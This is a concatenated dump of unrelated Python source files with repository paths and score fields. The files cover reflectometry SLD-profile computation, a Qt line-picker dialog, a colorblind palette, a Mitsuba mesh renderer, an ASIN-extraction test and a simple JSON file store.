        # An operator outside the dispatch table is a programming error.
        raise Error(f'invalid operation: {defn.op!r}')
    else:
        return formatter(defn, prev_op)
| 2.640625 | 3 |
direfl/api/sld_profile.py | TUM-E21-ThinFilms/direfl | 0 | 12765143 | import numpy as np
import cmath
from functools import reduce
from math import pi, ceil
from numpy import sin, cos
from scipy.interpolate import interp1d
"""
References:
[Majkrzak2003] <NAME>, <NAME>: Physica B 336 (2003) 27-38
Phase sensitive reflectometry and the unambiguous determination
of scattering length density profiles
"""
def interpolate(x, fx):
    """Build a linear interpolant of fx over x that evaluates to 0 outside
    the sampled domain (instead of raising a bounds error)."""
    interpolant = interp1d(x, fx, bounds_error=False, fill_value=0)
    return interpolant
def refr_idx(q, sld):
    """Return the refractive index for scattering length density ``sld``
    [1/AA^2] at wavevector transfer ``q`` [1/AA].

    The units may be chosen arbitrarily as long as sld/q**2 is
    dimensionless; the arguments must not be pre-scaled by any constants.
    For example::

        q = 0.01
        sld = 1e-6

    The result is complex below the critical edge (q < q_c) and purely
    real at or above it.
    """
    # 16*pi*sld/q^2 exceeds 1 below the critical edge, making the root complex.
    reduced = 16 * pi * sld / (q ** 2)
    return cmath.sqrt(1 - reduced)
def reflection_matrix(q, sld, thickness, as_matrix=False):
    """Return the transfer ("reflection") matrix of a single uniform slab
    (sld, thickness) at wavevector transfer q.

    See Majkrzak & Berk, Physical Review B Vol. 52 Nr 15, 1995:
    "Exact determination of the phase in neutron reflectometry", Eq. (1).

    When ``as_matrix`` is True a 2x2 numpy array is returned; otherwise the
    four entries are returned as the tuple (a, b, c, d).
    """
    n = refr_idx(q, sld)
    theta = 0.5 * q * n * thickness
    # Entries of the characteristic matrix for one homogeneous layer.
    a = cos(theta)
    b = 1 / n * sin(theta)
    c = -n * sin(theta)
    d = cos(theta)
    if as_matrix:
        return np.array([[a, b], [c, d]])
    return a, b, c, d
class SLDProfile(object):
    """Abstract base for scattering-length-density profiles."""

    def __init__(self):
        pass

    def as_matrix(self, q):
        """Return the Abeles transfer-matrix coefficients at q.

        The four values (w, x, y, z) correspond to the matrix
        [[w, x], [y, z]].  The base class returns all zeros.
        """
        return 0, 0, 0, 0
class ConstantSLDProfile(SLDProfile):
    """A single uniform slab of fixed SLD and thickness.

    Raises RuntimeError for implausibly large SLD values and
    NotImplementedError for a non-zero interfacial roughness (sigma).
    """

    def __init__(self, sld, thickness, sigma=0):
        # Sanity guard: physical SLDs are far below this bound.
        if sld > 15:
            raise RuntimeError("SLD seems to be unreasonable high")
        self._sld = float(sld)   # scattering length density
        self._d = float(thickness)  # slab thickness
        self._r = float(sigma)   # interfacial roughness (unsupported)
        if self._r > 0:
            raise NotImplementedError("Roughness not implemented yet")

    def as_matrix(self, q):
        # Delegate to the single-slab transfer matrix.
        return reflection_matrix(q, self._sld, self._d)
class ConcatSLDProfile(SLDProfile):
    """Sequential composition of several sub-profiles.

    The first element in sld_profiles is closest to the substrate.  The
    combined transfer matrix is the ordered product of the sub-profiles'
    matrices (optionally reversed).
    """

    def __init__(self, sld_profiles, reverse=False):
        self._slds = sld_profiles
        self._reverse = reverse

    def as_matrix(self, q):
        """Return the composed transfer-matrix entries (a, b, c, d) at q."""
        m = len(self._slds) * [None]
        for i in range(0, len(self._slds)):
            a, b, c, d = self._slds[i].as_matrix(q)
            m[i] = np.array([[a, b], [c, d]])
        if self._reverse:
            m = list(reversed(m))
        # BUG FIX: np.linalg.multi_dot raises ValueError for fewer than two
        # matrices, so a concat of a single profile crashed.  reduce(np.dot,
        # ...) multiplies in the same left-to-right order and handles the
        # single-element case (matching SlabsSLDProfile.as_matrix).
        m = reduce(np.dot, m)
        return m[0][0], m[0][1], m[1][0], m[1][1]
class FunctionSLDProfile(SLDProfile):
    """Profile defined by a function sld(x), discretized into constant
    slabs of width dx over the given support interval."""

    def __init__(self, function, support, dx=0.1):
        # function: callable x -> sld value
        # support: (start, end) interval over which the function is sampled
        # dx: slab width used for the piecewise-constant discretization
        self._f = function
        self._supp = support
        self._dx = dx
        # Sample points spanning the support; ceil keeps at least full coverage.
        self._xspace = np.linspace(support[0], support[1],
                                   ceil((support[1] - support[0]) * 1 / dx))
        self._feval = [self._f(x) for x in self._xspace]
        # One constant slab per sample; composed via ConcatSLDProfile.
        self._m = [ConstantSLDProfile(fx, dx) for fx in self._feval]
        self._concat = ConcatSLDProfile(self._m, reverse=False)

    def as_matrix(self, q):
        # Delegate to the slab composition.
        return self._concat.as_matrix(q)
class SlabsSLDProfile(SLDProfile):
    """Profile given as discretized (z, rho) samples, e.g. produced from a
    refl1d sample or explicit slab definitions."""

    def __init__(self, z, rho):
        # z: depth coordinates; rho: SLD value at each z (same length)
        self._z = z
        self._rho = rho

    @classmethod
    def from_sample(cls, sample, dz=0.1, dA=1e-4, probe=None):
        """Build a profile by rendering a refl1d sample into microslabs.

        Raises RuntimeWarning if the sample has a non-negligible imaginary
        (absorptive) SLD, which the reconstruction techniques cannot handle.
        """
        from refl1d.probe import NeutronProbe
        from refl1d.profile import Microslabs

        if probe is None:
            # The values T and L do not matter for 'just' building the SLD profile
            probe = NeutronProbe(T=[1.0], L=[1.0])

        slabs = Microslabs(1, dz)
        sample.render(probe, slabs)
        slabs.finalize(True, dA)

        # ignore the imaginary part, this should be zero anyway
        z, rho, irho = slabs.smooth_profile(dz)

        if any(irho >= 1e-2):
            raise RuntimeWarning("Sample contains absorptive SLD (imag >= 1e-2). "
                                 "Reconstruction techniques do not support this.")

        # refl1d likes to use SLD * 1e6
        return cls(z, rho * 1e-6)

    @classmethod
    def from_slabs(cls, thickness, sld, roughness, precision=1):
        """Build a profile directly from slab thickness/sld/roughness lists.

        NOTE(review): from_slabs and from_sample do not create identical
        profiles -- the results are shifted (see comment below).
        """
        # You should rather use the from_sample method, since its easier to
        # understand. This method here is just a kind of 'fallback'
        # if you don't wanna have the overhead of building the Stacks in refl1d
        # just to put the data in here..
        #
        # WARNING: from_slabs and from_sample do not create the same slab profile
        # they are shifted profiles (by I'd guess 3*roughness[0]?)
        from refl1d.profile import build_profile

        w = thickness
        sld = sld

        # Means, the first layer is the substrate and we only have to include
        # the roughness effect. To do so, select a proper thickness (> 0) such
        # that the convolution with the gaussian kernel is sufficiently approximated
        if w[0] == 0:
            # refl1d uses 3 sigma usually
            # why 3?
            # that's 3 sigma and the gaussian smoothing is nearly zero out there
            # thus the 'substrate' layer is big enough to be approximated by this
            # ofc bigger sigma values (>= 5) are better, but they need more
            # computation
            w[0] = 3 * roughness[0]

        z = np.linspace(0, sum(w) + roughness[-1] * 5, int(precision * sum(w)) + 1)
        offsets = np.cumsum(w)
        rho = build_profile(z, offsets, roughness, sld)

        return cls(z, rho)

    def thickness(self):
        """Total depth extent covered by the profile."""
        return max(self._z) - min(self._z)

    def plot_profile(self, offset=0, reverse=False):
        """Plot rho vs. z (shifted by offset; optionally depth-reversed)."""
        import pylab
        rho = self._rho
        if reverse:
            rho = list(reversed(self._rho))
        pylab.plot(self._z + offset, rho)

    def as_matrix(self, q):
        """Compose the transfer matrix of all discretized slabs at q."""
        # len(dz) = len(self._z) - 1
        dz = np.diff(self._z)
        m = len(dz) * [None]
        for idx in range(0, len(dz)):
            m[idx] = reflection_matrix(q, self._rho[idx], dz[idx], as_matrix=True)

        # There is still some potential here
        # Whats happening here:
        # m1 * m2 * m3 * m4 * m5 ... in a sequentially manner
        # maybe it's faster if you do something like
        # (m1 * m2) * (m3 * m4) * ...
        # and redo the grouping in the next step. this should be then O(log n)
        # compared to the seq. multiplication which is O(n)....
        # BUT: this has to be done in C code, not in a python implementation :/
        m = reduce(np.dot, m)
        return m[0][0], m[0][1], m[1][0], m[1][1]
class Reflectivity(object):
    """Computes the complex reflection amplitude and reflectivity |r|^2 for
    an SLDProfile between given fronting and backing media.

    See [Majkrzak2003] equation (17).
    """

    def __init__(self, sld_profile, fronting, backing):
        # fronting/backing: SLD of the media on either side of the film.
        assert isinstance(sld_profile, SLDProfile)
        self._sld = sld_profile
        self._f, self._b = fronting, backing

        # The input should be of the magnitude 1e-6 ... 1e-5
        if any(abs(np.array([fronting, backing])) >= 1e-1):
            raise RuntimeWarning("Given fronting/backing SLD values are too high")

    def reflection(self, q_space, as_function=True):
        """Complex reflection amplitude r(q) over q_space.

        Returns an interpolating function by default, or the raw complex
        array when ``as_function`` is False.
        """
        r = np.ones(len(q_space), dtype=complex)

        for idx, q in enumerate(q_space):
            # Skip q == 0 where the refractive index diverges; r stays 1.
            if abs(q) < 1e-10:
                continue

            # See [Majkrzak2003] equation (17)
            f, h = refr_idx(q, self._f), refr_idx(q, self._b)
            A, B, C, D = self._sld.as_matrix(q)
            r[idx] = (f * h * B + C + 1j * (f * D - h * A)) / \
                     (f * h * B - C + 1j * (f * D + h * A))

        if as_function:
            return self.to_function(r, q_space, square=False)
        else:
            return r

    @staticmethod
    def to_function(r, q_space, square=False):
        """Interpolate sampled r over q; with square=True return |r|^2."""
        real = interpolate(q_space, r.real)
        imag = interpolate(q_space, r.imag)

        if square:
            # |r|^2 = Re(r)^2 + Im(r)^2
            return lambda q: real(q)**2 + imag(q)**2
        else:
            return lambda q: real(q) + 1j * imag(q)

    def reflectivity(self, q_space):
        """Reflectivity R(q) = |r(q)|^2 as an interpolating function."""
        r = self.reflection(q_space)
        return lambda q: abs(r(q)) ** 2

    def plot(self, q_space):
        """Plot R(q) over q_space and return the reflectivity function."""
        import pylab
        R = self.reflectivity(q_space)
        pylab.plot(q_space, R(q_space))
        return R
return R
| 2.953125 | 3 |
tests/runtime-trace-tests/cases/assign_stmt.py | jaydeetay/pxt | 977 | 12765144 | # regular assignment
foo = 7
print(foo)
# annotated assignmnet
bar: number = 9
print(bar)
| 2.390625 | 2 |
hexrd/ui/line_picker_dialog.py | cjh1/hexrdgui | 0 | 12765145 | <filename>hexrd/ui/line_picker_dialog.py
import copy
from PySide2.QtCore import Qt, QObject, Signal
from itertools import cycle
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.widgets import Cursor
from hexrd.ui import enter_key_filter
from hexrd.ui.constants import ViewType
from hexrd.ui.ui_loader import UiLoader
from hexrd.ui.zoom_canvas import ZoomCanvas
class LinePickerDialog(QObject):
    """Interactive dialog for picking point sequences ("lines") on a polar
    matplotlib canvas, with a synced zoom preview.

    Left-click adds a point (or freezes the zoom in two-click mode),
    right-click finishes the current line (or inserts a NaN break in
    single-line mode).  The collected data is emitted via ``result``.
    """

    # Emitted when a point was picked
    point_picked = Signal()

    # Emitted when a line is completed
    line_completed = Signal()

    # Emitted when the dialog is closed
    finished = Signal()

    # Emits the ring data that was selected
    result = Signal(list)

    # Emitted when the last point was removed
    last_point_removed = Signal()

    def __init__(self, canvas, parent, single_line_mode=False):
        # canvas: main plotting canvas to pick on
        # parent: Qt parent widget for the dialog UI
        # single_line_mode: when True, picks form one NaN-separated line
        super(LinePickerDialog, self).__init__(parent)

        self.canvas = canvas

        loader = UiLoader()
        self.ui = loader.load_file('line_picker_dialog.ui', parent)

        self.single_line_mode = single_line_mode
        self.ui.start_new_line_label.setVisible(not self.single_line_mode)

        # Keep the dialog floating on top of its parent as a tool window.
        flags = self.ui.windowFlags()
        self.ui.setWindowFlags(flags | Qt.Tool)

        self.ui.installEventFilter(enter_key_filter)

        self.ring_data = []      # completed lines, as Nx2 arrays
        self.linebuilder = None  # LineBuilder for the line in progress
        self.lines = []          # matplotlib artists for all lines
        self.two_click_mode = False

        # Secondary canvas showing a zoomed view around the cursor.
        self.zoom_canvas = ZoomCanvas(canvas)
        self.zoom_canvas.tth_tol = self.ui.zoom_tth_width.value()
        self.zoom_canvas.eta_tol = self.ui.zoom_eta_width.value()
        self.ui.zoom_canvas_layout.addWidget(self.zoom_canvas)

        # Cycle through matplotlib's default colors for successive lines.
        prop_cycle = plt.rcParams['axes.prop_cycle']
        self.color_cycler = cycle(prop_cycle.by_key()['color'])

        self.move_dialog_to_left()

        self.setup_connections()

    def setup_connections(self):
        """Wire UI widgets, canvas events, and internal signals together."""
        self.ui.accepted.connect(self.accept)
        self.ui.rejected.connect(self.reject)
        self.ui.zoom_tth_width.valueChanged.connect(self.zoom_width_changed)
        self.ui.zoom_eta_width.valueChanged.connect(self.zoom_width_changed)
        self.ui.back_button.pressed.connect(self.back_button_pressed)
        self.point_picked.connect(self.update_enable_states)
        self.last_point_removed.connect(self.update_enable_states)
        self.ui.two_click_mode.toggled.connect(self.two_click_mode_changed)
        self.bp_id = self.canvas.mpl_connect('button_press_event',
                                             self.button_pressed)

        self.zoom_canvas.point_picked.connect(self.zoom_point_picked)

    def update_enable_states(self):
        """Enable the back button only when there is a point to undo."""
        linebuilder = self.linebuilder
        enable_back_button = (
            linebuilder is not None and
            all(z for z in [linebuilder.xs, linebuilder.ys])
        )
        self.ui.back_button.setEnabled(enable_back_button)

    def move_dialog_to_left(self):
        # This moves the dialog to the left border of the parent
        ph = self.ui.parent().geometry().height()
        px = self.ui.parent().geometry().x()
        py = self.ui.parent().geometry().y()
        dw = self.ui.width()
        dh = self.ui.height()
        self.ui.setGeometry(px, py + (ph - dh) / 2.0, dw, dh)

    def clear(self):
        """Remove all picked data and artists, and disconnect canvas events."""
        self.ring_data.clear()

        while self.lines:
            self.lines.pop(0).remove()

        self.linebuilder = None
        self.cursor = None

        self.zoom_canvas.cleanup()
        self.zoom_canvas = None

        self.canvas.mpl_disconnect(self.bp_id)
        self.bp_id = None
        self.canvas.draw()

    def zoom_width_changed(self):
        """Propagate the zoom width spinbox values to the zoom canvas."""
        self.zoom_canvas.tth_tol = self.ui.zoom_tth_width.value()
        self.zoom_canvas.eta_tol = self.ui.zoom_eta_width.value()
        self.zoom_canvas.render()

    def zoom_point_picked(self, event):
        """Accept a point picked on the (frozen) zoom canvas."""
        self.zoom_frozen = False
        if self.linebuilder is None:
            return

        # Append the data to the line builder
        self.linebuilder.append_data(event.xdata, event.ydata)

    def back_button_pressed(self):
        """Undo the most recently picked point of the current line."""
        linebuilder = self.linebuilder

        if linebuilder is None:
            # Nothing to do
            return

        if not linebuilder.xs or not linebuilder.ys:
            # Nothing to delete
            return

        linebuilder.xs.pop(-1)
        linebuilder.ys.pop(-1)
        linebuilder.update_line_data()

        self.last_point_removed.emit()

    def two_click_mode_changed(self, on):
        """Toggle two-click picking (first click freezes the zoom view)."""
        self.two_click_mode = on
        self.zoom_frozen = False

    def start(self):
        """Begin an interactive picking session (polar mode only)."""
        if self.canvas.mode != ViewType.polar:
            print('line picker only works in polar mode!')
            return

        ax = self.canvas.axis

        # list for set of rings 'picked'
        self.ring_data.clear()

        # fire up the cursor for this tool
        self.cursor = Cursor(ax, useblit=True, color='red', linewidth=1)
        self.add_line()
        self.show()

    def add_line(self):
        """Create a fresh empty artist + LineBuilder for the next line."""
        ax = self.canvas.axis
        color = next(self.color_cycler)
        marker = '.'
        linestyle = 'None'

        # empty line
        line, = ax.plot([], [], color=color, marker=marker,
                        linestyle=linestyle)
        self.linebuilder = LineBuilder(line)
        self.linebuilder.point_picked.connect(self.point_picked.emit)
        self.update_enable_states()

        self.lines.append(line)
        self.canvas.draw()

    def line_finished(self):
        """Store the in-progress line's points and start a new line."""
        linebuilder = self.linebuilder

        # If the linebuilder is already gone, just return
        if linebuilder is None:
            return

        # append to ring_data
        ring_data = np.vstack([linebuilder.xs, linebuilder.ys]).T

        if len(ring_data) == 0:
            # Don't do anything if there is no ring data
            return

        self.ring_data.append(ring_data)
        self.add_line()

    def button_pressed(self, event):
        """Handle mouse clicks on the main canvas (left=pick, right=next)."""
        if event.button == 3:
            # Advance the line to the next one
            self.next_line()
            return

        if event.button != 1:
            # Nothing else to do
            return

        if self.two_click_mode:
            # Freeze the zoom window
            self.zoom_frozen = True
            return

        if self.linebuilder is None:
            return

        self.linebuilder.append_data(event.xdata, event.ydata)

    def next_line(self):
        """Finish the current line (or insert a NaN break in single-line mode)."""
        if not self.single_line_mode:
            # Complete a line
            self.line_completed.emit()
            self.line_finished()
            return

        # Otherwise, insert NaNs
        if self.linebuilder is None:
            return

        self.linebuilder.append_data(np.nan, np.nan)

    def accept(self):
        """Finalize picking and emit the collected data."""
        # Finish the current line
        self.line_finished()

        # finished needs to be emitted before the result
        self.finished.emit()
        self.result.emit(copy.deepcopy(self.ring_data))
        self.clear()

    def reject(self):
        """Cancel picking, discarding everything."""
        self.finished.emit()
        self.clear()

    def show(self):
        self.ui.show()

    @property
    def zoom_frozen(self):
        # Proxy for the zoom canvas's frozen state.
        return self.zoom_canvas.frozen

    @zoom_frozen.setter
    def zoom_frozen(self, v):
        self.zoom_canvas.frozen = v
class LineBuilder(QObject):
    """Accumulates picked (x, y) points onto a matplotlib line artist and
    emits ``point_picked`` after each addition."""

    # Emits when a point was picked
    point_picked = Signal()

    def __init__(self, line):
        # line: matplotlib Line2D whose data is extended as points arrive
        super().__init__()

        self.line = line
        self.canvas = line.figure.canvas
        self.xs = list(line.get_xdata())
        self.ys = list(line.get_ydata())

    def append_data(self, x, y):
        """Add one point, push it to the artist, and notify listeners."""
        self.xs.append(x)
        self.ys.append(y)
        self.update_line_data()
        self.point_picked.emit()

    def update_line_data(self):
        """Sync the accumulated points to the artist and redraw the canvas."""
        self.line.set_data(self.xs, self.ys)
        self.canvas.draw()
| 2.265625 | 2 |
figures/kCSD_properties/colorblind_friendly.py | rdarie/kCSD-python | 11 | 12765146 | <reponame>rdarie/kCSD-python<filename>figures/kCSD_properties/colorblind_friendly.py<gh_stars>10-100
# Based on
# Color Universal Design (CUD)
# - How to make figures and presentations that are friendly to Colorblind people
#
#
# <NAME>
# Jikei Medial School (Japan)
#
# <NAME>
# University of Tokyo, Institute for Molecular and Cellular Biosciences (Japan)
# (both are strong protanopes)
# 11.20.2002 (modified on 2.15.2008, 9.24.2008)
# http://jfly.iam.u-tokyo.ac.jp/color/#pallet
import collections
from matplotlib import colors
_Color = collections.namedtuple('_Color', ['red', 'green', 'blue'])
def _html(r, g, b):
return "#{:02X}{:02X}{:02X}".format(r, g, b)
# The eight colors of the CUD (Color Universal Design) palette as RGB
# triples, followed by their "#RRGGBB" string forms for use with matplotlib.
_BLACK     = _Color(  0,   0,   0)
_ORANGE    = _Color(230, 159,   0)
_SKY_BLUE  = _Color( 86, 180, 233)
_GREEN     = _Color(  0, 158, 115)
_YELLOW    = _Color(240, 228,  66)
_BLUE      = _Color(  0, 114, 178)
_VERMILION = _Color(213,  94,   0)
_PURPLE    = _Color(204, 121, 167)

BLACK     = _html(*_BLACK)
ORANGE    = _html(*_ORANGE)
SKY_BLUE  = _html(*_SKY_BLUE)
GREEN     = _html(*_GREEN)
YELLOW    = _html(*_YELLOW)
BLUE      = _html(*_BLUE)
VERMILION = _html(*_VERMILION)
PURPLE    = _html(*_PURPLE)
def _BipolarColormap(name, negative, positive):
    """Build a diverging colormap running negative -> white -> positive.

    ``negative`` and ``positive`` are _Color triples (0-255); the midpoint
    of every channel is pinned to 1.0 (white).
    """
    segments = {}
    for channel in ('red', 'green', 'blue'):
        lo = getattr(negative, channel) / 255.
        hi = getattr(positive, channel) / 255.
        # Each entry is (position, value_below, value_above).
        segments[channel] = [(0.0, lo, lo),
                             (0.5, 1.0, 1.0),
                             (1.0, hi, hi)]
    return colors.LinearSegmentedColormap(name, segments)
# Ready-made colorblind-friendly diverging colormaps built from the CUD palette.
# BUG FIX: stripped stray artifact tokens ("| 2.859375 | 3 |") that had been
# fused onto the PRGn line, which made the module a syntax error.
bwr = _BipolarColormap('cbf.bwr', _BLUE, _VERMILION)
PRGn = _BipolarColormap('cbf.PRGn', _PURPLE, _GREEN)
server/scripts/mts_render.py | smartscenes/multiscan | 6 | 12765147 | import os
import mitsuba
import numpy as np
import argparse
import utils
mitsuba.set_variant('scalar_spectral')
from mitsuba.core import xml, Thread, ScalarTransform4f, Transform4f, Bitmap, Struct
from mitsuba.python.xml import WriteXML
from enoki.scalar import *
import open3d as o3d
from plyfile import PlyData, PlyElement
from render import gravity_aligned_mobb
def cvt_rgba2float(filename, tmp_out_file):
    """Convert a PLY mesh with uint8 RGB vertex colors into one with
    float [0, 1] colors, writing the converted mesh next to the input.

    Returns the Nx6 array of (x, y, z, r, g, b) vertex data.
    """
    plydata = PlyData.read(filename)
    x = np.asarray(plydata['vertex']['x'])
    y = np.asarray(plydata['vertex']['y'])
    z = np.asarray(plydata['vertex']['z'])
    # Normalize 8-bit color channels to [0, 1] floats.
    red = plydata['vertex']['red'].astype('float32') / 255.
    green = plydata['vertex']['green'].astype('float32') / 255.
    blue = plydata['vertex']['blue'].astype('float32') / 255.

    vertices = np.vstack((x, y, z, red, green, blue)).transpose()
    ply_vertices = [tuple(x) for x in vertices.tolist()]
    ply_vertices = np.array(ply_vertices, dtype=[('x', 'f4'), ('y', 'f4'), ('z', 'f4'),
                                                 ('red', 'f4'), ('green', 'f4'), ('blue', 'f4')])
    el = PlyElement.describe(ply_vertices, 'vertex')
    # Replace the vertex element but keep the original faces.
    plydata.elements = [el, plydata['face']]
    # NOTE(review): tmp_out_file is already an absolute path at the call
    # site, so os.path.join ignores the dirname component -- works, but
    # presumably the join was meant for a bare filename; confirm.
    plydata.write(os.path.join(os.path.dirname(filename), tmp_out_file))
    return vertices
def mts_render(filename, vertices, output):
    """Render a vertex-colored PLY mesh with Mitsuba 2 and write a PNG.

    The camera is placed above the mesh's gravity-aligned oriented bounding
    box, looking at its center, far enough back to frame the whole object.

    Args:
        filename: path to the PLY mesh (float vertex colors expected).
        vertices: Nx6 (x, y, z, r, g, b) array; positions are used for the
            bounding-box / camera computation.
        output: path of the PNG image to write (an .exr is written too).
    """
    # Scene skeleton: a path-tracer integrator plus the nodes added below.
    data = {"type": "scene", "./": {"type": "path"}}
    shape_dict = {
        "type": "ply", 'filename': filename,
        "mybsdf": {
            "type": "diffuse",
            "reflectance": {
                # Shade each vertex with its stored color attribute.
                "type": "mesh_attribute",
                "name": "vertex_color"
                # "type": "rgb",
                # "value": [231. / 255, 181. / 255, 75. / 255],
            }
        }
    }
    # Uniform environment light.
    emitter_dict = {"type": "constant"}
    sensor_dict = {
        "type": "perspective",
        'fov': 60,
        "myfilm": {
            "type": "hdrfilm",
            "rfilter": {"type": "gaussian"},
            "width": 1920,
            "height": 1440,
            "pixel_format": "rgba"
        },
        "mysampler": {
            "type": "independent",
            "sample_count": 64,
        }
    }

    # Gravity-aligned minimum oriented bounding box of the vertex positions.
    obb_center, obb_size, trans_inv = gravity_aligned_mobb(vertices[:, 0:3], np.array((0.0,1.0,0.0)))
    rot = trans_inv
    inv_rot = np.linalg.inv(rot)
    cam_target = obb_center
    cam_translate = Transform4f.translate(cam_target)
    cam_un_translate = Transform4f.translate(-cam_target)

    world_up = Vector3f(0, 0, -1)
    cam_offvec = Vector3f(0, 0, 0)
    # Back the camera off by the box's bounding-sphere radius plus a margin
    # so the whole mesh fits in frame.
    margin = 1.0
    radius = np.linalg.norm(obb_size) / 2.0 + margin
    cam_offset = cam_offvec + world_up
    cam_offset = rot.dot(cam_offset)
    cam_offset = 2 * radius * cam_offset / np.linalg.norm(cam_offset)
    cam_origin = cam_target + cam_offset
    cam_up = rot.dot(Vector3f(0, 1, 0))
    sensor_dict['to_world'] = ScalarTransform4f.look_at(origin=cam_origin, target=cam_target, up=cam_up)

    data['myshape'] = shape_dict
    data['mysensor'] = sensor_dict
    data['myemitter'] = emitter_dict

    # Render the scene and develop both HDR (.exr) and tone-mapped PNG files.
    scene = xml.load_dict(data)
    sensor = scene.sensors()[0]
    scene.integrator().render(scene, sensor)
    film = sensor.film()
    film.set_destination_file(os.path.splitext(output)[0]+'.exr')
    film.develop()
    img = film.bitmap(raw=True).convert(Bitmap.PixelFormat.RGB, Struct.Type.UInt8, srgb_gamma=True)
    img.write(output)

    # out = WriteXML('./test.xml')
    # out.write_dict(data)
def configure(args):
    """Validate the parsed CLI arguments.

    Checks that the input is an existing .ply file and that the output's
    parent directory exists. Prints an error and returns False on the
    first failed check; returns True when both pass.
    """
    if not utils.file_exist(args.input, '.ply'):
        utils.print_e(f'Input file {args.input} not exists')
        return False
    dir_path = os.path.dirname(args.output)
    if utils.folder_exist(dir_path):
        return True
    utils.print_e(f'Cannot create file in folder {dir_path}')
    return False
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Mitsuba2 Rendering!')
    # BUGFIX: the original registered -i/--input twice, which makes argparse
    # raise ArgumentError("conflicting option strings") at startup.
    parser.add_argument('-i', '--input', dest='input', type=str, action='store', required=True,
                        help='Input mesh ply file')
    parser.add_argument('-o', '--output', dest='output', type=str, action='store', required=True,
                        help='Output rendered png file')
    args = parser.parse_args()
    if not configure(args):
        # Exit non-zero so callers/scripts can detect the validation failure
        # (the original exited with 0, signalling success).
        exit(1)
    filename = os.path.realpath(args.input)
    # Intermediate PLY with float vertex colors, written next to the input.
    tmp_out_file = os.path.splitext(filename)[0]+'_temp_rgba_float.ply'
    vertices = cvt_rgba2float(filename, tmp_out_file)
    mts_render(tmp_out_file, vertices, args.output)
| 2.078125 | 2 |
tests/test_tools.py | frenners/python-amazon-paapi | 121 | 12765148 | <filename>tests/test_tools.py
from amazon_paapi.exceptions import AsinNotFoundException
from amazon_paapi.tools import get_asin
import pytest
def test_get_asin():
    """get_asin extracts the ASIN from bare ASINs and Amazon product URLs,
    and raises AsinNotFoundException when no ASIN can be found."""
    valid_cases = [
        ('B01N5IB20Q', 'B01N5IB20Q'),
        ('https://www.amazon.es/gp/product/B07PHPXHQS', 'B07PHPXHQS'),
        ('https://www.amazon.es/gp/product/B07PHPXHQS?pf_rd_r=3FXDZDV1W6KY83KEE2Z4&pf_rd_p=c6fa5af0-ec7c-40de-8332-fd1421de4244&pd_rd_r=58786171-de0f-4fe1-a2df-ee335d6715ee&pd_rd_w=KND7A&pd_rd_wg=kIr5z&ref_=pd_gw_unk', 'B07PHPXHQS'),
        ('https://www.amazon.es/dp/B07PKW4CKF', 'B07PKW4CKF'),
        ('https://www.amazon.es/dp/B07PKW4CKF?_encoding=UTF8&ref_=pocs_dp_m_sp_multi_c_more_nooffers_B08D1G2XVX', 'B07PKW4CKF'),
    ]
    for candidate, expected in valid_cases:
        assert get_asin(candidate) == expected
    for bad_input in ('https://www.amazon.es/gp/', 'this is not even a URL'):
        with pytest.raises(AsinNotFoundException):
            get_asin(bad_input)
| 2.25 | 2 |
src/core/database/database.py | Bizarious/mra-discord | 0 | 12765149 | import os
import json
from typing import Union
class DataBasic:
    """Base for file-backed data stores: knows where the data directory
    lives and ensures it exists on first startup."""

    # Root directory for persisted data; subclasses override this.
    path = ""

    def first_startup(self):
        """Create the data directory if it is missing.

        Uses os.makedirs so a nested ``path`` (missing parents) is handled
        too -- the original os.mkdir raised FileNotFoundError in that case.
        """
        if not os.path.exists(self.path):
            os.makedirs(self.path)
            print(f"created {self.path} directory")
class Data(DataBasic):
    """Buffered text/JSON file store rooted at ``./data``.

    Payloads are persisted under ``self.path`` and optionally cached in an
    in-memory buffer so repeated reads skip the disk.
    """

    path = "./data"

    def __init__(self):
        # In-memory cache of file contents, keyed by file name (JSON files
        # are keyed without their .json extension).
        self._buffer = {}
        self.first_startup()

    @property
    def buffer(self):
        """The in-memory content cache (file name -> cached payload)."""
        return self._buffer

    @staticmethod
    def check_path(path: str):
        """Create *path* (including missing parents) if it does not exist."""
        if not os.path.exists(path):
            # makedirs instead of mkdir so nested sub-paths work too.
            os.makedirs(path)
            print(f"Created {path}")

    @staticmethod
    def check_file(file: str, path: str):
        """Create an empty file under *path* if missing.

        JSON files are initialized with an empty object so a later
        ``json.load`` succeeds.
        """
        full_name = f"{path}/{file}"
        if not os.path.exists(full_name):
            with open(full_name, "w") as f:
                if file.endswith(".json"):
                    json.dump({}, f)

    def _load_file(self, *, file: str, path: str = ""):
        """Open ``self.path/path/file`` for reading, creating directory and
        file first if needed. The caller is responsible for closing the
        returned handle."""
        path = f"{self.path}/{path}"
        self.check_path(path)
        self.check_file(file, path)
        return open(f"{path}/{file}")

    def get(self, *, file, path: str = "", buffer: bool = True) -> str:
        """Return the text content of *file*, served from the cache when
        present; cache the freshly read content unless *buffer* is False."""
        if file in self._buffer:
            return self._buffer[file]
        # BUGFIX: close the handle deterministically (the original leaked
        # the file object returned by _load_file).
        with self._load_file(file=file, path=path) as f:
            content = f.read()
        if buffer:
            self._buffer[file] = content
        return content

    def get_json(self, *, file, path: str = "", buffer: bool = True) -> Union[list, dict]:
        """Like :meth:`get`, but reads and parses ``file + ".json"``."""
        if file in self._buffer:
            return self._buffer[file]
        # BUGFIX: close the handle deterministically (the original leaked it).
        with self._load_file(file=file + ".json", path=path) as f:
            content = json.load(f)
        if buffer:
            self._buffer[file] = content
        return content

    def _save_file(self, *, data, file: str, path: str = ""):
        """Write *data* to ``self.path/path/file`` -- JSON-encoded when the
        file name ends in .json, verbatim text otherwise."""
        path = f"{self.path}/{path}"
        self.check_path(path)
        with open(f"{path}/{file}", "w") as f:
            if file.endswith(".json"):
                json.dump(data, f)
            else:
                f.write(data)

    def set(self, *, file, path: str = "", data, buffer: bool = True):
        """Persist text *data* to *file* and optionally cache it."""
        if buffer:
            self._buffer[file] = data
        self._save_file(data=data, file=file, path=path)

    def set_json(self, *, file, path: str = "", data, buffer: bool = True):
        """Persist *data* as JSON to ``file + ".json"`` and optionally
        cache it (under the extension-less key)."""
        if buffer:
            self._buffer[file] = data
        self._save_file(data=data, file=file + ".json", path=path)
if __name__ == "__main__":
    # Manual smoke test: instantiate the store (creating ./data if needed)
    # and load-or-create testing/test.json.
    store = Data()
    store.get_json(file="test", path="testing")
| 3.0625 | 3 |
simplepybotsdk/configurations.py | vellons/SimplePYBotSDK | 11 | 12765150 | VERSION = "0.7.0"
LICENSE = "MIT - Copyright (c) 2021 <NAME>"

# Loop frequencies in iterations per second (Hz).
